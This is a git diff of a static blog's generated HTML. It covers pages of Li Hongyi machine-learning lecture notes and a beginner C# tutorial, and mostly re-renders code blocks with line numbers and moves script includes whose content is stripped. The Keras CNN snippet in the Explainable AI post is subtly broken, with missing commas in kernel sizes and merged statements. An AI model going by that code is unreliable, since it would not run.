                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" index fd2931b8e6..6095528f6b 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 7-Self-supervised learning for Speech and Image/index.html" @@ -44,8 +44,6 @@ - - @@ -4677,6 +4675,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" index 91b43a9125..29bbae267e 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 8-Auto-encoder Anomaly Detection/index.html" @@ -44,8 +44,6 @@ - - @@ -4600,6 +4598,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" index 7384fe8325..f57a336310 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 9-Explainable AI/index.html" @@ -44,8 +44,6 @@ - - @@ -477,7 +475,7 @@

                    png

                    -
                    model = Sequential()model.add(Conv2D(32,(33),padding='same',input_shape(120,120,3)))
                    model.add(Activation('relu'))model.add(Conv2D(32,(33)))
                    model.add(Activation('relu'))model.add(MaxPooling2D(pool_size=(22)))
                    model.add(Conv2D(64,(33),padding='same'))
                    model.add(Activation('relu'))
                    model.add(Conv2D(64,(33)))
                    model.add(Activation('relu'))
                    model.add(MaxPooling2D(pool_size=(22)))
                    model.add(Conv2D(256,(33),padding='same'))
                    model.add(Activation('relu'))
                    model.add(Conv2D(256,(33)))
                    model.add(Activation('relu'))
                    model.add(MaxPooling2D(pool_size=(22)))
                    model.add(Flatten())
                    model.add(Dense(1024))
                    model.add(Activation('relu'))
                    model.add(Dense(2))model.add(Activation('softmax'))
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    model = Sequential()model.add(Conv2D(32,(33),padding='same',input_shape(120,120,3)))
                    model.add(Activation('relu'))model.add(Conv2D(32,(33)))
                    model.add(Activation('relu'))model.add(MaxPooling2D(pool_size=(22)))
                    model.add(Conv2D(64,(33),padding='same'))
                    model.add(Activation('relu'))
                    model.add(Conv2D(64,(33)))
                    model.add(Activation('relu'))
                    model.add(MaxPooling2D(pool_size=(22)))
                    model.add(Conv2D(256,(33),padding='same'))
                    model.add(Activation('relu'))
                    model.add(Conv2D(256,(33)))
                    model.add(Activation('relu'))
                    model.add(MaxPooling2D(pool_size=(22)))
                    model.add(Flatten())
                    model.add(Dense(1024))
                    model.add(Activation('relu'))
                    model.add(Dense(2))model.add(Activation('softmax'))

                    ​ 写一个卷积神经网络,结果它的效果非常好!

                    png

                    png

                    @@ -4588,6 +4586,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" index 047aa5a631..188081e209 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Recent Advance of Self-supervised learning for NLP/index.html" @@ -44,8 +44,6 @@ - - @@ -4710,6 +4708,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" index a547afbec4..4dafd83f94 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\343\200\220\347\224\237\346\210\220\345\274\217AI\343\200\221\345\244\247\346\250\241\345\236\213 + \345\244\247\350\263\207\346\226\231 = \347\245\236\345\245\207\347\265\220\346\236\234\357\274\237/index.html" @@ -44,8 +44,6 @@ - - @@ -4573,6 +4571,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" index 3b99955ff1..7cb9558f1f 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\345\234\226\345\203\217/index.html" @@ -44,8 +44,6 @@ - - @@ -4555,6 +4553,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" index f5927ca1b5..cfc0f43451 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\246\202\344\275\225\347\224\237\346\210\220\346\226\207\345\217\245/index.html" @@ -44,8 +44,6 @@ - - @@ -4570,6 +4568,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" index a5943c02c5..bc13d66143 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\251\237\345\231\250\345\255\270\347\277\222\345\237\272\346\234\254\346\246\202\345\277\265\344\273\213\347\264\271/index.html" @@ -44,8 +44,6 @@ - - @@ -4585,6 +4583,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" index a58c24dcfd..e11327532e 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-\346\255\243\347\242\272\350\252\215\350\255\230 ChatGPT/index.html" @@ -44,8 +44,6 @@ - - @@ -4575,6 +4573,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Math-Fouriter/index.html b/posts/Math-Fouriter/index.html index e851feaeae..517cf581af 100644 --- a/posts/Math-Fouriter/index.html +++ b/posts/Math-Fouriter/index.html @@ -44,8 +44,6 @@ - - @@ -698,6 +696,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/PL-RUNOOB-CSharp/index.html b/posts/PL-RUNOOB-CSharp/index.html index 1552543f39..3be9bbcf08 100644 --- a/posts/PL-RUNOOB-CSharp/index.html +++ b/posts/PL-RUNOOB-CSharp/index.html @@ -44,8 +44,6 @@ - - @@ -409,7 +407,7 @@

                    Hello world

                    ​ VS 里创建一个 控制台应用(.NET Framework)

                    webp

                    ​ 开始 Hello World!

                    -
                    using System;
                    namespace HelloWorldApplication
                    {
                    /* 类名为 HelloWorld */
                    class HelloWorld
                    {
                    /* main 函数 */
                    static void Main(string[] args)
                    {
                    /* 我的第一个 C# 程序 */
                    Console.WriteLine("Hello World!");
                    Console.ReadKey();
                    }
                    }
                    }
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    using System;
                    namespace HelloWorldApplication
                    {
                    /* 类名为 HelloWorld */
                    class HelloWorld
                    {
                    /* main 函数 */
                    static void Main(string[] args)
                    {
                    /* 我的第一个 C# 程序 */
                    Console.WriteLine("Hello World!");
                    Console.ReadKey();
                    }
                    }
                    }

                    C# 环境

                    • C# 环境 | 菜鸟教程 (runoob.com)
                    • @@ -436,15 +434,15 @@

                      using System;  // using 关键字用于在程序中包含 System 命名空间。
                      namespace HelloWorldApplication // 一个 namespace 里包含了一系列的类。便于管理,还可以防止类重名,在这里也可以不写。
                      {
                      class HelloWorld // C# 是完全面向对象的语言,执行代码必须放在一个类中
                      {
                      static void Main(string[] args) // Main 方法,是所有 C# 程序的入口点。Main 方法说明当执行时类将做什么动作。
                      {
                      /* 我的第一个 C# 程序*/
                      Console.WriteLine("Hello World");
                      Console.ReadKey(); // 针对 VS.NET 用户的。这使得程序会等待一个按键的动作,防止程序从 Visual Studio .NET 启动时屏幕会快速运行并关闭。在 VS2022 中,也可以 Ctrl + F5 启动调试防止控制台自动关闭。
                      }
                      }
                      }
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      using System;  // using 关键字用于在程序中包含 System 命名空间。
                      namespace HelloWorldApplication // 一个 namespace 里包含了一系列的类。便于管理,还可以防止类重名,在这里也可以不写。
                      {
                      class HelloWorld // C# 是完全面向对象的语言,执行代码必须放在一个类中
                      {
                      static void Main(string[] args) // Main 方法,是所有 C# 程序的入口点。Main 方法说明当执行时类将做什么动作。
                      {
                      /* 我的第一个 C# 程序*/
                      Console.WriteLine("Hello World");
                      Console.ReadKey(); // 针对 VS.NET 用户的。这使得程序会等待一个按键的动作,防止程序从 Visual Studio .NET 启动时屏幕会快速运行并关闭。在 VS2022 中,也可以 Ctrl + F5 启动调试防止控制台自动关闭。
                      }
                      }
                      }

                      C# 基本语法

                      ​ C# 是一种面向对象的编程语言。在面向对象的程序设计方法中,程序由各种相互交互的对象组成。相同种类的对象通常具有相同的类型,或者说,是在相同的 class 中。

                      ​ 例如,以 Rectangle(矩形)对象为例。它具有 lengthwidth 属性。根据设计,它可能需要接受这些属性值、计算面积和显示细节。

                      -
                      using System;
                      namespace RectangleApplication
                      {
                      class Rectangle
                      {
                      // 成员变量
                      double length;
                      double width;
                      public void Acceptdetails()
                      {
                      length = 4.5;
                      width = 3.5;
                      }
                      public double GetArea()
                      {
                      return length * width;
                      }
                      public void Display()
                      {
                      Console.WriteLine("Length: {0}", length);
                      Console.WriteLine("Width: {0}", width);
                      Console.WriteLine("Area: {0}", GetArea());
                      }
                      }

                      class ExecuteRectangle
                      {
                      static void Main(string[] args)
                      {
                      Rectangle r = new Rectangle();
                      r.Acceptdetails();
                      r.Display();
                      Console.ReadLine();
                      }
                      }
                      }
                      -
                      Length: 4.5
                      Width: 3.5
                      Area: 15.75
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      using System;
                      namespace RectangleApplication
                      {
                      class Rectangle
                      {
                      // 成员变量
                      double length;
                      double width;
                      public void Acceptdetails()
                      {
                      length = 4.5;
                      width = 3.5;
                      }
                      public double GetArea()
                      {
                      return length * width;
                      }
                      public void Display()
                      {
                      Console.WriteLine("Length: {0}", length);
                      Console.WriteLine("Width: {0}", width);
                      Console.WriteLine("Area: {0}", GetArea());
                      }
                      }

                      class ExecuteRectangle
                      {
                      static void Main(string[] args)
                      {
                      Rectangle r = new Rectangle();
                      r.Acceptdetails();
                      r.Display();
                      Console.ReadLine();
                      }
                      }
                      }
                      +
                      1
                      2
                      3
                      Length: 4.5
                      Width: 3.5
                      Area: 15.75

                      C# 数据类型

                      • C# 数据类型 | 菜鸟教程 (runoob.com)
                      • @@ -456,23 +454,23 @@

                        值类型(Value types)

                        -
                        using System;

                        namespace ConsoleApplication1
                        {
                        class Program
                        {
                        static void Main(string[] args)
                        {
                        PrintValueTypeRange();
                        }
                        static void PrintValueTypeRange()
                        {
                        Console.WriteLine("int 类型的最大值是:{0}", int.MaxValue); // 32 位有符号整数类型
                        Console.WriteLine("uint 类型的最大值是:{0}", uint.MaxValue); // 32 位无符号整数类型
                        Console.WriteLine("byte 类型的最大值是:{0}", byte.MaxValue); // 8 位无符号整数
                        Console.WriteLine("sbyte 类型的最大值是:{0}", sbyte.MaxValue); // 8 位有符号整数类型
                        Console.WriteLine("short 类型的最大值是:{0}", short.MaxValue); // 16 位有符号整数类型
                        Console.WriteLine("ushort 类型的最大值是:{0}", ushort.MaxValue); // 16 位无符号整数类型
                        Console.WriteLine("long 类型的最大值是:{0}", long.MaxValue); // 64 位有符号整数类型
                        Console.WriteLine("ulong 类型的最大值是:{0}", ulong.MaxValue); // 64 位无符号整数类型
                        Console.WriteLine("float 类型的最大值是:{0}", float.MaxValue); // 32 位单精度浮点型
                        Console.WriteLine("double 类型的最大值是:{0}", double.MaxValue); // 64 位双精度浮点型
                        Console.WriteLine("decimal 类型的最大值是:{0}", decimal.MaxValue); // 128 位精确的十进制值,28-29 有效位数
                        Console.WriteLine("int 类型的最小值是:{0}", int.MinValue);
                        Console.WriteLine("uint 类型的最小值是:{0}", uint.MinValue);
                        Console.WriteLine("byte 类型的最小值是:{0}", byte.MinValue);
                        Console.WriteLine("sbyte 类型的最小值是:{0}", sbyte.MinValue);
                        Console.WriteLine("short 类型的最小值是:{0}", short.MinValue);
                        Console.WriteLine("ushort 类型的最小值是:{0}", ushort.MinValue);
                        Console.WriteLine("long 类型的最小值是:{0}", long.MinValue);
                        Console.WriteLine("ulong 类型的最小值是:{0}", ulong.MinValue);
                        Console.WriteLine("float 类型的最小值是:{0}", float.MinValue);
                        Console.WriteLine("double 类型的最小值是:{0}", double.MinValue);
                        Console.WriteLine("decimal 类型的最小值是:{0}", decimal.MinValue);
                        Console.ReadKey();
                        }
                        }
                        }
                        -
                        int      类型的最大值是:2147483647
                        uint 类型的最大值是:4294967295
                        byte 类型的最大值是:255
                        sbyte 类型的最大值是:127
                        short 类型的最大值是:32767
                        ushort 类型的最大值是:65535
                        long 类型的最大值是:9223372036854775807
                        ulong 类型的最大值是:18446744073709551615
                        float 类型的最大值是:3.402823E+38
                        double 类型的最大值是:1.79769313486232E+308
                        decimal 类型的最大值是:79228162514264337593543950335
                        int 类型的最小值是:-2147483648
                        uint 类型的最小值是:0
                        byte 类型的最小值是:0
                        sbyte 类型的最小值是:-128
                        short 类型的最小值是:-32768
                        ushort 类型的最小值是:0
                        long 类型的最小值是:-9223372036854775808
                        ulong 类型的最小值是:0
                        float 类型的最小值是:-3.402823E+38
                        double 类型的最小值是:-1.79769313486232E+308
                        decimal 类型的最小值是:-79228162514264337593543950335
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        23
                        24
                        25
                        26
                        27
                        28
                        29
                        30
                        31
                        32
                        33
                        34
                        35
                        36
                        37
                        38
                        using System;

                        namespace ConsoleApplication1
                        {
                        class Program
                        {
                        static void Main(string[] args)
                        {
                        PrintValueTypeRange();
                        }
                        static void PrintValueTypeRange()
                        {
                        Console.WriteLine("int 类型的最大值是:{0}", int.MaxValue); // 32 位有符号整数类型
                        Console.WriteLine("uint 类型的最大值是:{0}", uint.MaxValue); // 32 位无符号整数类型
                        Console.WriteLine("byte 类型的最大值是:{0}", byte.MaxValue); // 8 位无符号整数
                        Console.WriteLine("sbyte 类型的最大值是:{0}", sbyte.MaxValue); // 8 位有符号整数类型
                        Console.WriteLine("short 类型的最大值是:{0}", short.MaxValue); // 16 位有符号整数类型
                        Console.WriteLine("ushort 类型的最大值是:{0}", ushort.MaxValue); // 16 位无符号整数类型
                        Console.WriteLine("long 类型的最大值是:{0}", long.MaxValue); // 64 位有符号整数类型
                        Console.WriteLine("ulong 类型的最大值是:{0}", ulong.MaxValue); // 64 位无符号整数类型
                        Console.WriteLine("float 类型的最大值是:{0}", float.MaxValue); // 32 位单精度浮点型
                        Console.WriteLine("double 类型的最大值是:{0}", double.MaxValue); // 64 位双精度浮点型
                        Console.WriteLine("decimal 类型的最大值是:{0}", decimal.MaxValue); // 128 位精确的十进制值,28-29 有效位数
                        Console.WriteLine("int 类型的最小值是:{0}", int.MinValue);
                        Console.WriteLine("uint 类型的最小值是:{0}", uint.MinValue);
                        Console.WriteLine("byte 类型的最小值是:{0}", byte.MinValue);
                        Console.WriteLine("sbyte 类型的最小值是:{0}", sbyte.MinValue);
                        Console.WriteLine("short 类型的最小值是:{0}", short.MinValue);
                        Console.WriteLine("ushort 类型的最小值是:{0}", ushort.MinValue);
                        Console.WriteLine("long 类型的最小值是:{0}", long.MinValue);
                        Console.WriteLine("ulong 类型的最小值是:{0}", ulong.MinValue);
                        Console.WriteLine("float 类型的最小值是:{0}", float.MinValue);
                        Console.WriteLine("double 类型的最小值是:{0}", double.MinValue);
                        Console.WriteLine("decimal 类型的最小值是:{0}", decimal.MinValue);
                        Console.ReadKey();
                        }
                        }
                        }
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        int      类型的最大值是:2147483647
                        uint 类型的最大值是:4294967295
                        byte 类型的最大值是:255
                        sbyte 类型的最大值是:127
                        short 类型的最大值是:32767
                        ushort 类型的最大值是:65535
                        long 类型的最大值是:9223372036854775807
                        ulong 类型的最大值是:18446744073709551615
                        float 类型的最大值是:3.402823E+38
                        double 类型的最大值是:1.79769313486232E+308
                        decimal 类型的最大值是:79228162514264337593543950335
                        int 类型的最小值是:-2147483648
                        uint 类型的最小值是:0
                        byte 类型的最小值是:0
                        sbyte 类型的最小值是:-128
                        short 类型的最小值是:-32768
                        ushort 类型的最小值是:0
                        long 类型的最小值是:-9223372036854775808
                        ulong 类型的最小值是:0
                        float 类型的最小值是:-3.402823E+38
                        double 类型的最小值是:-1.79769313486232E+308
                        decimal 类型的最小值是:-79228162514264337593543950335

                        ​ Decimal 不是浮点数据类型。Decimal 结构包含一个二进制整数值以及一个符号位和一个整数比例因子,该比例因子用于指定该值的小数部分。因此,在内存中,Decimal 数字的表示形式比浮点类型(Single 和 Double)更精确。Decimal 数据类型用于存储精确的小数值。与 Float 和 Double 等浮点数数据类型相比,Decimal 能够提供更高的精度,避免了浮点数计算中的舍入误差。

                        ​ 如需得到一个类型或一个变量在特定平台上的准确尺寸,可以使用 sizeof 方法。表达式 sizeof(type) 产生以字节为单位存储对象或类型的存储尺寸。

                        -
                        using System;

                        namespace DataTypeApplication
                        {
                        class Program
                        {
                        static void Main(string[] args)
                        {
                        Console.WriteLine("Size of bool: {0}", sizeof(bool));
                        Console.WriteLine("Size of byte: {0}", sizeof(byte));
                        Console.WriteLine("Size of sbyte: {0}", sizeof(sbyte));
                        Console.WriteLine("Size of int: {0}", sizeof(int));
                        Console.WriteLine("Size of float: {0}", sizeof(float));
                        Console.WriteLine("Size of double: {0}", sizeof(double));
                        Console.WriteLine("Size of decimal: {0}", sizeof(decimal));
                        Console.ReadLine();
                        }
                        }
                        }
                        -
                        Size of bool: 1
                        Size of byte: 1
                        Size of sbyte: 1
                        Size of int: 4
                        Size of float: 4
                        Size of double: 8
                        Size of decimal: 16
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        using System;

                        namespace DataTypeApplication
                        {
                        class Program
                        {
                        static void Main(string[] args)
                        {
                        Console.WriteLine("Size of bool: {0}", sizeof(bool));
                        Console.WriteLine("Size of byte: {0}", sizeof(byte));
                        Console.WriteLine("Size of sbyte: {0}", sizeof(sbyte));
                        Console.WriteLine("Size of int: {0}", sizeof(int));
                        Console.WriteLine("Size of float: {0}", sizeof(float));
                        Console.WriteLine("Size of double: {0}", sizeof(double));
                        Console.WriteLine("Size of decimal: {0}", sizeof(decimal));
                        Console.ReadLine();
                        }
                        }
                        }
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        Size of bool: 1
                        Size of byte: 1
                        Size of sbyte: 1
                        Size of int: 4
                        Size of float: 4
                        Size of double: 8
                        Size of decimal: 16

                        对象(Object)类型

                        对象(Object)类型是 C# 通用类型系统(Common Type System - CTS)中所有数据类型的终极基类。Object 是 System.Object 类的别名。所以对象(Object)类型可以被分配任何其他类型(值类型、引用类型、预定义类型或用户自定义类型)的值。但是,在分配值之前,需要先进行类型转换。

                        ​ 当一个值类型转换为对象类型时,则被称为装箱;另一方面,当一个对象类型转换为值类型时,则被称为拆箱

                        -
                        using System;

                        namespace Test
                        {
                        class Program
                        {
                        static void Main(string[] args)
                        {
                        // 原始值类型
                        int original = 10;

                        // 装箱过程,将 int 类型装箱为 object 类型
                        object boxed = original;

                        // 拆箱过程,将 object 类型拆箱为 int 类型
                        int unboxed = (int)boxed;

                        Console.WriteLine($"原始值:{original}");
                        Console.WriteLine($"拆箱后的值:{unboxed}");
                        }
                        }
                        }
                        -
                        原始值:10
                        拆箱后的值:10
                        +
                        1
                        2
                        3
                        4
                        5
                        6
                        7
                        8
                        9
                        10
                        11
                        12
                        13
                        14
                        15
                        16
                        17
                        18
                        19
                        20
                        21
                        22
                        using System;

                        namespace Test
                        {
                        class Program
                        {
                        static void Main(string[] args)
                        {
                        // 原始值类型
                        int original = 10;

                        // 装箱过程,将 int 类型装箱为 object 类型
                        object boxed = original;

                        // 拆箱过程,将 object 类型拆箱为 int 类型
                        int unboxed = (int)boxed;

                        Console.WriteLine($"原始值:{original}");
                        Console.WriteLine($"拆箱后的值:{unboxed}");
                        }
                        }
                        }
                        +
                        1
                        2
                        原始值:10
                        拆箱后的值:10

                        动态(Dynamic)类型

                        ​ 您可以存储任何类型的值在动态数据类型变量中。这些变量的类型检查是在运行时发生的。

                        ​ 声明动态类型的语法:

                        -
                        dynamic d = 20;
                        +
                        1
                        dynamic d = 20;

                        ​ 动态类型与对象类型相似,但是对象类型变量的类型检查是在编译时发生的,而动态类型变量的类型检查是在运行时发生的

                        • C#中的 var 和 dynamic - 阿子 - 博客园 (cnblogs.com)
                        • @@ -485,18 +483,18 @@

                          字符串(String)类型

                          字符串(String)类型 允许您给变量分配任何字符串值。字符串(String)类型是 System.String 类的别名。它是从对象(Object)类型派生的。字符串(String)类型的值可以通过两种形式进行分配:引号@引号

                          ​ 例如:

                          -
                          string str = "runoob.com";
                          +
                          1
                          string str = "runoob.com";

                          ​ C# string 字符串的前面可以加 @(称作"逐字字符串")将转义字符\当作普通字符对待(类似于 python 里的原始字符串前缀 r?),比如:

                          -
                          string str = @"C:\Windows";
                          +
                          1
                          string str = @"C:\Windows";

                          ​ 等价于:

                          -
                          string str = "C:\\Windows";
                          +
                          1
                          string str = "C:\\Windows";

                          ​ @ 字符串中可以任意换行,换行符及缩进空格都计算在字符串长度之内

                          -
                          using System;

                          namespace Test
                          {
                          class Program
                          {
                          static void Main(string[] args)
                          {
                          string str = @"<script type=""text/javascript"">
                          <!--
                          -->
                          </script>";
                          Console.WriteLine(str);
                          Console.ReadLine();
                          }
                          }
                          }
                          -
                          <script type="text/javascript">
                          <!--
                          -->
                          </script>
                          +
                          1
                          2
                          3
                          4
                          5
                          6
                          7
                          8
                          9
                          10
                          11
                          12
                          13
                          14
                          15
                          16
                          17
                          using System;

                          namespace Test
                          {
                          class Program
                          {
                          static void Main(string[] args)
                          {
                          string str = @"<script type=""text/javascript"">
                          <!--
                          -->
                          </script>";
                          Console.WriteLine(str);
                          Console.ReadLine();
                          }
                          }
                          }
                          +
                          1
                          2
                          3
                          4
                          <script type="text/javascript">
                          <!--
                          -->
                          </script>

                          ​ 用户自定义引用类型有:classinterfacedelegate。我们将在以后的章节中讨论这些类型。

                          指针类型(Pointer types)

                          ​ 指针类型变量存储另一种类型的内存地址。C# 中的指针与 C 或 C++ 中的指针有相同的功能。

                          -
                          type* identifier;
                          +
                          1
                          type* identifier;

                          C# 类型转换

                          • C# 类型转换 | 菜鸟教程 (runoob.com)
                          • @@ -505,12 +503,12 @@

                            隐式类型转换

                            ​ 隐式转换是不需要编写代码来指定的转换,编译器会自动进行。

                            ​ 隐式转换是指将一个较小范围的数据类型转换为较大范围的数据类型时(如,从 intlong,从 floatdouble 等),编译器会自动完成类型转换,这些转换是 C# 默认的以安全方式进行的转换,不会导致数据丢失

                            -
                            byte b = 10;
                            int i = b; // 隐式转换,不需要显式转换
                            +
                            1
                            2
                            byte b = 10;
                            int i = b; // 隐式转换,不需要显式转换

                            显式转换

                            ​ 显式类型转换,即强制类型转换,需要程序员在代码中明确指定。

                            ​ 显式转换是指将一个较大范围的数据类型转换为较小范围的数据类型时,或者将一个对象类型转换为另一个对象类型时,需要使用强制类型转换符号进行显示转换,强制转换(可能)会造成数据丢失

                            -
                            using System;

                            namespace Test
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            double a = 3.141592653589;
                            float b = 3.141592653589f;

                            Console.WriteLine(a + "");
                            Console.WriteLine((float)a + "");
                            Console.WriteLine(b);
                            Console.ReadLine();
                            }
                            }
                            }
                            -
                            3.141592653589
                            3.141593
                            3.141593
                            +
                            1
                            2
                            3
                            4
                            5
                            6
                            7
                            8
                            9
                            10
                            11
                            12
                            13
                            14
                            15
                            16
                            17
                            18
                            using System;

                            namespace Test
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            double a = 3.141592653589;
                            float b = 3.141592653589f;

                            Console.WriteLine(a + "");
                            Console.WriteLine((float)a + "");
                            Console.WriteLine(b);
                            Console.ReadLine();
                            }
                            }
                            }
                            +
                            1
                            2
                            3
                            3.141592653589
                            3.141593
                            3.141593

                            C# 类型转换方法

                            ​ 使用 System.Convert 类中的函数来进行类型转换。提供了一种安全的方式来执行类型转换,因为它们可以处理 null 值,如果转换不可能进行,则会抛出异常

                            @@ -521,26 +519,26 @@

                            using System;

                            namespace Test
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            string a = "3.1415926535";
                            float b = Convert.ToSingle(a);
                            Single c = Convert.ToSingle(a);
                            double d = Convert.ToDouble(a);

                            Console.WriteLine(a);
                            Console.WriteLine(b);
                            Console.WriteLine(c);
                            Console.WriteLine(d);
                            Console.ReadLine();
                            }
                            }
                            }
                            -
                            3.1415926535
                            3.141593
                            3.141593
                            3.1415926535
                            +
                            1
                            2
                            3
                            4
                            5
                            6
                            7
                            8
                            9
                            10
                            11
                            12
                            13
                            14
                            15
                            16
                            17
                            18
                            19
                            20
                            21
                            using System;

                            namespace Test
                            {
                            class Program
                            {
                            static void Main(string[] args)
                            {
                            string a = "3.1415926535";
                            float b = Convert.ToSingle(a);
                            Single c = Convert.ToSingle(a);
                            double d = Convert.ToDouble(a);

                            Console.WriteLine(a);
                            Console.WriteLine(b);
                            Console.WriteLine(c);
                            Console.WriteLine(d);
                            Console.ReadLine();
                            }
                            }
                            }
                            +
                            1
                            2
                            3
                            4
                            3.1415926535
                            3.141593
                            3.141593
                            3.1415926535

                            .ToString() 可将特定类型转换为字符串,当然也可以使用 +""

                            -
                            using System;

                            namespace TypeConversionApplication
                            {
                            class StringConversion
                            {
                            static void Main(string[] args)
                            {
                            int i = 75;
                            float f = 53.005f;
                            double d = 2345.7652;
                            bool b = true;
                            Console.WriteLine(i.ToString());
                            Console.WriteLine(f.ToString());
                            Console.WriteLine(d.ToString());
                            Console.WriteLine(b.ToString());
                            Console.ReadKey();
                            }
                            }
                            }
                            +
                            1
